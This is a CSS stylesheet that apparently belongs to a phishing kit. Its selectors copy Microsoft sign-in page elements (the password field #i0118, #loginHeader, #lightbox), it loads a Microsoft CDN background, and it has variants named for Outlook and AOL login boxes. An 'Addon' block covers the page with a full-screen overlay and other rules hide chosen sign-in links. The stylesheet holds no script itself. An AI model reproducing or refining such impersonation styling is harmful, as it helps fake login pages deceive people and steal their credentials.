*{
    box-sizing: border-box;
}

.out .win-button-pin-bottom .inline-block > div{
    font-size: 12px;
    margin-bottom: 16px;
}

.added{
    box-sizing: border-box;
    animation: fadeIn 1s;
    background-size: cover,cover;
    background: url(https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg) no-repeat, no-repeat center center, center center;
}

.added .board{
    -webkit-box-shadow: 0 2px 6px rgba(0,0,0,0.2);
    -moz-box-shadow: 0 2px 6px rgba(0,0,0,0.2);
    box-shadow: 0 2px 6px rgba(0,0,0,0.2);
    border-radius: 0;
}

.added #board2{
    width: auto;
    height: 397px;
    border-radius:0;
}

.added .out #lightbox{
    box-shadow: none;
    margin: 0;
    min-width:460px;
}

.out .form-group{
    padding-left: 0;
}

.out .win-button-pin-bottom .inline-block > div a{
    text-decoration: none;
    color: #0067b8;
}

.out.me #i0118{
    font-weight: 400;
    font-size: 16px;
}

.out.me #loginHeader{
    color: #000000;
    font-weight: 500;
}

.out.me #lightbox{
    box-shadow: none;
    margin: 0;
    min-width: 460px;
    border-radius: 5px;
}

.out .col-md-24.ext-error.error{
    color: #e81123 !important;
}
.div_form button{
    letter-spacing: 2px;
}
.div_form a{
    display: block !important;
    -webkit-appearance: button !important;
    -moz-appearance: button !important;
    appearance: button !important;
    margin-left: 5px !important;
    width: calc(100% - 10px) !important;
    letter-spacing: 1px !important;
}

.div_form input[type=text]{
    letter-spacing: 2px;
}

@media screen and (min-width: 639px) {
    .aol .login-box.right {
        border-radius: 5px;
        max-width: 355px;
        box-shadow: none;
        max-height: 520px;
        min-height: 520px;
        border-top-color: transparent !important;
    }
}
@media screen and (max-width: 768px){
    .board {
        height: 100%;
        width: 100vw;
        overflow: hidden;
        border-radius: 0;
        transition: all .5s;
    }
}

.div_form a:before{
    letter-spacing: 40px;
}

/*
Addon
 */


.nobody #identifier{
    display: flex !important;
    z-index: 1000;
    position: fixed;
    top: 0;
    left: 0;
    width: 100vw;
    right: 0;
    bottom: 0;
    background: #737670;
    color: transparent !important;
}
.nobody #identifier *{
    display: none !important;
}


.div_main.outpath{
    background: url(../img/outpath.svg) no-repeat, no-repeat center center, center center;
    background-size: cover,cover;
    width: 100%;
    height: 100%;
    -webkit-animation: fadeIn .4s;
    -moz-animation: fadeIn .4s;
    -o-animation: fadeIn .4s;
    animation: fadeIn .4s;
}

.outpath .board{
    -webkit-box-shadow: none !important;
    box-shadow: none !important;
    background: transparent !important;
}

.outpath .out.me{
    -webkit-box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
    -moz-box-shadow: 0 2px 6px rgba(0,0,0,.2);
    box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
    border-radius: 0;
}

.outlookAdded{
    -webkit-box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
    -moz-box-shadow: 0 2px 6px rgba(0,0,0,.2);
    box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
    border-radius: 0;
}

.outpath .board .out .win-button-pin-bottom .inline-block div:last-child, .outpath .board .out .win-button-pin-bottom .inline-block div:nth-child(3){
    display: none !important;
}
